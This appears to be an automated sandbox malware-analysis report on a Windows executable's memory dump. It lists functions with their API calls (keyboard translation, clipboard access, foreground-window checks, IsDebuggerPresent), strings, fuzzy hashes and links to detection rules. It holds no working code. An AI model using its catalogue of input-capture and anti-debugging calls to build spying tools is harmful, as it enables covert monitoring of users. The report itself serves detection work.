Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID:
String ID: $ $.$.
API String ID: 0-1066414380
Opcode ID: 3da75f014bbb5f0127d3aaf7e9bf2eef44cc37bfb74c95875e0aeba415723dd9
Instruction ID: 6e007318a669670e565c3a342c47464d97f2f52040c45d9920ac776f0f82bb82
Opcode Fuzzy Hash: 3da75f014bbb5f0127d3aaf7e9bf2eef44cc37bfb74c95875e0aeba415723dd9
Instruction Fuzzy Hash: C202B7B1B0665582FAB7AB1794613FB63D1A79CBC0F444022FF8A577F5EA78C8819700

Uniqueness

Uniqueness Score: -1.00%

Function 000000014004A480, Relevance: 9.2, Strings: 7, Instructions: 482COMMON

Download Yara Rule

Strings

Can't Get Current Setting, xrefs: 000000014004AAE1
Off, xrefs: 000000014004AB83
Mixer Doesn't Support This Component Type, xrefs: 000000014004A7C4
Mixer Doesn't Have That Many of That Component Type, xrefs: 000000014004A613, 000000014004A7BD
Component Doesn't Support This Control Type, xrefs: 000000014004A635, 000000014004A7D9
Can't Change Setting, xrefs: 000000014004AADA
Can't Open Specified Mixer, xrefs: 000000014004A5C0

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID:
String ID: Can't Change Setting$Can't Get Current Setting$Can't Open Specified Mixer$Component Doesn't Support This Control Type$Mixer Doesn't Have That Many of That Component Type$Mixer Doesn't Support This Component Type$Off
API String ID: 0-3049241934
Opcode ID: cca815ec09b2b1fb2e3224eb0b6e27d4f8cf90be339723837cd9cead51612c30
Instruction ID: 87da850fe830252805f43a70ea0b430b860ff1b57711d8c44b57f2f9f7bfcd1e
Opcode Fuzzy Hash: cca815ec09b2b1fb2e3224eb0b6e27d4f8cf90be339723837cd9cead51612c30
Instruction Fuzzy Hash: 2522C032600AC489E7238F3795403E927A1FB5E7E8F1A9312BB5927BB5DB38D595C340

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140014380, Relevance: 9.1, APIs: 6, Instructions: 88keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardLayout.USER32 ref: 0000000140014393
ToUnicodeEx.USER32 ref: 00000001400143F7
ToUnicodeEx.USER32 ref: 0000000140014430
ToUnicodeEx.USER32 ref: 0000000140014460
ToUnicodeEx.USER32 ref: 00000001400144BB
MapVirtualKeyExW.USER32 ref: 00000001400144FF

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: Unicode$KeyboardLayoutVirtual
String ID:
API String ID: 3037800794-0
Opcode ID: 545c2ed9783a131bcb7f8cbf544cc439cd2fa4d501c49918ff8a630af7c3fa10
Instruction ID: d27c4c934f0849a16ef3496ffb96d3ad619c632090646d7cd05e72c0058309ce
Opcode Fuzzy Hash: 545c2ed9783a131bcb7f8cbf544cc439cd2fa4d501c49918ff8a630af7c3fa10
Instruction Fuzzy Hash: 35414C72508AD486E3769F16F4443DAB7A0F788785F44411AEBC947AA9DF3DC149CB10

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400B12B0, Relevance: 9.1, APIs: 6, Instructions: 83COMMON

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00000001400B1329
RtlLookupFunctionEntry.KERNEL32 ref: 00000001400B1341
RtlVirtualUnwind.KERNEL32 ref: 00000001400B137C
IsDebuggerPresent.KERNEL32 ref: 00000001400B13B5
SetUnhandledExceptionFilter.KERNEL32 ref: 00000001400B13BF
UnhandledExceptionFilter.KERNEL32 ref: 00000001400B13CA

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 06cdc858aad4cf909cf5e95ad4fddc294eb3d95f635c3eb613cd826690686522
Instruction ID: b3f56b7173bca9671eda89dbce58cc92b61b35eb7190f44ae6c12861a4ffeb10
Opcode Fuzzy Hash: 06cdc858aad4cf909cf5e95ad4fddc294eb3d95f635c3eb613cd826690686522
Instruction Fuzzy Hash: 86311A36214F8086EB658F66E8407DE73A4F788798F540126FB9D43BA9EF38C655CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400563A0, Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 247clipboardCOMMON

Download Yara Rule

APIs

IsClipboardFormatAvailable.USER32 ref: 0000000140056405
IsClipboardFormatAvailable.USER32 ref: 0000000140056412

Strings

MZ@, xrefs: 0000000140056540
<<>>, xrefs: 0000000140056418
U, xrefs: 0000000140056507

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: AvailableClipboardFormat
String ID: <<>>$MZ@$U
API String ID: 778505046-868637509
Opcode ID: f4b9dff0f170fe9ec079d0794f8b86e7df144f8d32168f8f38e1e292ed6fcbd6
Instruction ID: 137e9c4e5f174d3e5e5af7b4d218959abfcc626c12c00546a57ed91e3f3b499f
Opcode Fuzzy Hash: f4b9dff0f170fe9ec079d0794f8b86e7df144f8d32168f8f38e1e292ed6fcbd6
Instruction Fuzzy Hash: CFA1CE72600A0486FB66DF37E4853EE27A1A74DBD4F444621FB5A076F6EB3AC885C700

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400665E0, Relevance: 8.3, APIs: 2, Strings: 2, Instructions: 1348COMMON

Download Yara Rule

Strings

MZ@, xrefs: 00000001400665F5, 00000001400666C9, 000000014006725F, 00000001400677FA, 00000001400679C0, 0000000140067BD8, 00000001400683BA
Out of memory., xrefs: 00000001400683FE, 0000000140068481, 00000001400684BB

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID:
String ID: MZ@$Out of memory.
API String ID: 0-1491408499
Opcode ID: c9dea6349dfa1e5fab74dc0d412c35d9cfb7527401d25656f7b3b9419ffb4b4e
Instruction ID: 67c88ff453b93e935b8abb28dd75eb3ec4beebdfbb494fd3acfcff4b6f14abf7
Opcode Fuzzy Hash: c9dea6349dfa1e5fab74dc0d412c35d9cfb7527401d25656f7b3b9419ffb4b4e
Instruction Fuzzy Hash: 9ED2CD72200B808AEB66CF26D8587E937A2F748BD8F654A16FF5D177A4DB38C945C340

Uniqueness

Uniqueness Score: -1.00%

Function 000000014002D585, Relevance: 7.9, Strings: 6, Instructions: 359COMMON

Download Yara Rule

Strings

., xrefs: 000000014002D7D2
, xrefs: 000000014002D87A
, xrefs: 000000014002D6E8
., xrefs: 000000014002D642
, xrefs: 000000014002D622
, xrefs: 000000014002D7B2

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID:
String ID: $ $ $ $.$.
API String ID: 0-4137459148
Opcode ID: 9dcc52a7f6d0ae29b9a3b4466630d3489e0c432975c7d08f3329c1edbabf0bc4
Instruction ID: 4f559b980685476830d19910aa2c99eb4d7c20ec81cb7793d9df23fdd4db4838
Opcode Fuzzy Hash: 9dcc52a7f6d0ae29b9a3b4466630d3489e0c432975c7d08f3329c1edbabf0bc4
Instruction Fuzzy Hash: 07D1D576B0461146FB6AA72B85553FD32D2AB5D7C0F54812BFF4A976F4EB38CC829200

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140058650, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 299COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00000001400588C7

Strings

<<>>, xrefs: 0000000140058700

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: CountTick
String ID: <<>>
API String ID: 536389180-913080871
Opcode ID: 51cc0cfdcc3071d0e90c07f04d7386bf2dfe33e40b507f06cc523a7a264dd36c
Instruction ID: 56b92699cea23e04eb6d3cbab2e5107e25d794262e0459c24be76757f0e5aa57
Opcode Fuzzy Hash: 51cc0cfdcc3071d0e90c07f04d7386bf2dfe33e40b507f06cc523a7a264dd36c
Instruction Fuzzy Hash: ECE1887220468086EB66DB27E5903EA37A1F78CBD4F084526EF4A27BB5DF39C840C701

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140058440, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145clipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 000000014005C780: __RTDynamicCast.LIBCMT ref: 000000014005C7FA

ChangeClipboardChain.USER32 ref: 000000014005861C

Strings

Out of memory., xrefs: 00000001400585B0
Parameter #2 invalid., xrefs: 000000014005855A
Parameter #1 invalid., xrefs: 00000001400584CA

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: CastChainChangeClipboardDynamic
String ID: Out of memory.$Parameter #1 invalid.$Parameter #2 invalid.
API String ID: 105095322-136517104
Opcode ID: cb1dace055b36dab73e08383e411fc130bd4468ce27e96fa974db8b229486dc4
Instruction ID: 72aa8029bdfcf4eef3f61d91cefb473bcb0a1f6f01ddf18fdd73c6b9c0c97178
Opcode Fuzzy Hash: cb1dace055b36dab73e08383e411fc130bd4468ce27e96fa974db8b229486dc4
Instruction Fuzzy Hash: D451AC71601B0081FF33DB27E9447EA66A1B78CBC4F494826EF4967AB5EB3AC841C740

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400492B0, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 0000000140049304
DeviceIoControl.KERNEL32 ref: 000000014004934F
CloseHandle.KERNEL32 ref: 000000014004935A

Strings

\\.\%c:, xrefs: 00000001400492D4

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID: \\.\%c:
API String ID: 33631002-1260769427
Opcode ID: 51ba58c44234e0452f71825d3504733d234ef9ffd9e34a3a7a7de06c2e3b0600
Instruction ID: 3bef72625b741ab084ac48f361afd676c1660246cec715d60023b9952c02e508
Opcode Fuzzy Hash: 51ba58c44234e0452f71825d3504733d234ef9ffd9e34a3a7a7de06c2e3b0600
Instruction Fuzzy Hash: 7C115132618B8092D721CB11F44078AB3A4F3987E0F504326EB9943FA8DF3CC955CB40

Uniqueness

Uniqueness Score: -1.00%

Function 000000014008B0A0, Relevance: 6.1, APIs: 4, Instructions: 84windowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 000000014008B0F9
IsWindowVisible.USER32 ref: 000000014008B113
IsIconic.USER32 ref: 000000014008B120
ShowWindow.USER32 ref: 000000014008B132

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: Window$ForegroundIconicShowVisible
String ID:
API String ID: 1792044539-0
Opcode ID: 323d851a5d86d8e78e1cc1d88d7e9eaf91db61210707d7343b8952a3f91db42d
Instruction ID: 0682938d7b25976a749adbacffbf7f7ee7ebf1e817b6f3c36f216a9f9dc55e7d
Opcode Fuzzy Hash: 323d851a5d86d8e78e1cc1d88d7e9eaf91db61210707d7343b8952a3f91db42d
Instruction Fuzzy Hash: EB316D3260578485FE729B13A4683EA66E0F75CBD0F448115FB890BBA9EF7CC6818704

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140013FF0, Relevance: 6.1, APIs: 4, Instructions: 74threadCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 0000000140013FFA
GetWindowThreadProcessId.USER32 ref: 000000014001400C
GetKeyboardLayout.USER32 ref: 0000000140014018
VkKeyScanExW.USER32 ref: 0000000140014086

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: Window$ForegroundKeyboardLayoutProcessScanThread
String ID:
API String ID: 2198974680-0
Opcode ID: 31eaca18f2a52bd674596f7fadbd92a67bceeaead20581470c8a18e0cad3f0f1
Instruction ID: 1d03c28db23a8517f792269eaabf8888d864c0f24eaedc1cff8c20affc6a9250
Opcode Fuzzy Hash: 31eaca18f2a52bd674596f7fadbd92a67bceeaead20581470c8a18e0cad3f0f1
Instruction Fuzzy Hash: 9C21F472A0574086EB5ADF17B9943A876A1FB4CBC0F554128EB4A47BB5DB3EC882C700

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400053A0, Relevance: 6.1, APIs: 4, Instructions: 52clipboardCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00000001400053C4
OpenClipboard.USER32 ref: 00000001400053D3
GetTickCount.KERNEL32 ref: 00000001400053EF
OpenClipboard.USER32 ref: 000000014000542A

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: ClipboardCountOpenTick
String ID:
API String ID: 420724667-0
Opcode ID: 35ef54e439cabbf71b299015ed1146e5f704e6173d99c56d66aa156dba6be23b
Instruction ID: 844f528ee6dc662e3bb0189f467f393fe4fe9b166e64d7940e050903264bfb5a
Opcode Fuzzy Hash: 35ef54e439cabbf71b299015ed1146e5f704e6173d99c56d66aa156dba6be23b
Instruction Fuzzy Hash: 5111B27161160087F7569B27A8543EA23A1EB8C7DAF581118FB1A47BB5DB78C4D1DB00

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400881E0, Relevance: 6.0, APIs: 4, Instructions: 49windowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 0000000140088215
IsIconic.USER32 ref: 0000000140088226
GetWindowRect.USER32 ref: 000000014008823C
ClientToScreen.USER32 ref: 000000014008825E

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: Window$ClientForegroundIconicRectScreen
String ID:
API String ID: 4031265896-0
Opcode ID: e1c025826b533df3a8f7b1a32ad2b8fea82fc6e013546c45a7e0af0dcbc18c40
Instruction ID: 420adf0137e74385c68b4fab4adc0a61758b0ce34ec147b8b372fe71e6be38e2
Opcode Fuzzy Hash: e1c025826b533df3a8f7b1a32ad2b8fea82fc6e013546c45a7e0af0dcbc18c40
Instruction Fuzzy Hash: 6811EF32209B40C6EB65DB5BE444399B3E0F749BD4F044125FB8943A78EF78CA55CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400695C0, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 243COMMON

Download Yara Rule

Strings

MZ@, xrefs: 00000001400695CB

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID:
String ID: MZ@
API String ID: 0-2978689999
Opcode ID: c70542f700f6d098cbf844d0171326ba5d48325dea995c0c4cd2acbf3ef9c25e
Instruction ID: 8da53eed4f8096943430f0f426e3540e30361601dacb0c7a802a004e08b2c735
Opcode Fuzzy Hash: c70542f700f6d098cbf844d0171326ba5d48325dea995c0c4cd2acbf3ef9c25e
Instruction Fuzzy Hash: C691E27160571485FB2A8F2B98503B9229AE74EBD8F648925FF5E47EF4DE39C4429300

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400AE660, Relevance: 4.8, APIs: 3, Instructions: 340COMMON

Download Yara Rule

APIs

memcpy_s.LIBCMT ref: 00000001400AE6EB

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: memcpy_s
String ID:
API String ID: 1502251526-0
Opcode ID: a4ba192f34cb14f1be87fd0ad62269652c9cee304b49aa3a07e6b272cc409d05
Instruction ID: 64864dd45c1473883d6efcdbffc386a67a83a93b4a3cc09d9a6bb3744db0b6ec
Opcode Fuzzy Hash: a4ba192f34cb14f1be87fd0ad62269652c9cee304b49aa3a07e6b272cc409d05
Instruction Fuzzy Hash: 0BD1A0327146C587EB75CF16E1847AAB7A1F7AC7C4F148224EB4A57B64DA3CE981CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400055F0, Relevance: 4.6, APIs: 3, Instructions: 137threadCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00000001400056EE
GetWindowThreadProcessId.USER32 ref: 0000000140005700
GetKeyboardLayout.USER32 ref: 000000014000570C

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: Window$ForegroundKeyboardLayoutProcessThread
String ID:
API String ID: 620179318-0
Opcode ID: eb4181835ded9bcb8e75848920d8a0ae98ec7ab5a574e89e42ed8c352d816526
Instruction ID: 367901c36b6b4db2780135b97616c509dd967937fcc6e46d04cab3578b5833fd
Opcode Fuzzy Hash: eb4181835ded9bcb8e75848920d8a0ae98ec7ab5a574e89e42ed8c352d816526
Instruction Fuzzy Hash: 9951F676705B40C7EA66EB2BF4943AA32A0FB4A7E5F544529FB89437F4DB38C4809700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140062320, Relevance: 4.5, APIs: 3, Instructions: 34fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32 ref: 000000014006234E
FindFirstFileW.KERNEL32 ref: 000000014006236B
FindClose.KERNEL32 ref: 0000000140062385

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: 78623a590fd4ac922d2dd50725788ace720d02894296dc7b00d289bef885c016
Instruction ID: 3b6d71697b4364919c41a067718e5337948b48f41352adf92319f46571a47e12
Opcode Fuzzy Hash: 78623a590fd4ac922d2dd50725788ace720d02894296dc7b00d289bef885c016
Instruction Fuzzy Hash: 60F0547560570192EE165722B8453E813516B99BB1F581730BE3D077F0EB7C8ADA5500

Uniqueness

